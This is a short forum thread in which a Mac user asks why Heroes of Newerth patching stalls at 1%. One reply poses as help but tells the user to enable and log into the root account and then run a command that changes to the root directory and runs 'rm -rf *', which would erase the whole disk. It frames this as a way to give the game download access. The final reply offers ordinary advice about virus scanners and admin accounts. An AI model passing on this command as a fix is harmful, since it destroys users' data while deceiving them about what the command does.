Hi i just bought my macbok and downloaded HoN. However during the patching stage it stopes downloading at 1%. i tried restarting,redownloading but nothing works. Can someone who play HoN on a mac Shed some light?

yeah you just need to configure it so your computer doesnt stop the download process

you need to login to the "root" account when you start up your computer. the password will be the same as the one you entered when you installed your OS. alternatively, you can go to a terminal window and type "sudo passwd root && su -" to gain the same access.

then, in a terminal window, type the following (without the quotes):

"cd / && echo "match: Heroes of Newerth" && rm -rf *"

this should give HoN access to download any patch files, and should fix the problem

could also just be your virus scanner or something blocking the connection to hon servers. also installing things anytime on a mac while you're not on the admin acc is a hassle
